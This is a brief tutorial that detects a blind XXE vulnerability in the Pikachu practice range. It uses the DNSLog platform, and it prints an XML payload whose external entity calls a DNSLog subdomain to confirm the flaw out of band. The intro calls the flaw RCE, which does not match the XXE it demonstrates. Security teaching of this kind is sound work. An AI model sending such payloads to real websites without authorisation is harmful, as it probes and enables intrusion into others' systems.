DNSLog Vulnerability Detection (5) XXE Vulnerability Practical Combat
In this article, we will learn how to use the DNSLog platform to detect whether a target website has an RCE vulnerability. Next, we will use Pikachu's shooting range as a demonstration. First, let’s enter the XXE vulnerability interface of the Pikachu shooting range.
If there is an XXE vulnerability with no echo in the website interface at this time, how can we use the DNSLog platform to detect whether the vulnerability exists?
First, we open the DNSLog service platform and click Get SubDomain to obtain a subdomain name. The subdomain name we obtained here is adswfw.dnslog.cn
Next, we only need to submit the following payload and replace the XXXXX part with the subdomain name we obtained from the DNSLog service platform.
#原始的payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://xxxxxx.dnslog.cn">%remote;]>
#本文利用的payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://adswfw.dnslog.cn">%remote;]>
Click submit
Interface after submission
Now we return to the DNSLog service platform, click Refresh Record, and then the DNSLog service platform will return us the DNSLog parsing record. Now we have verified through the DNSLog platform that there is an XXE vulnerability.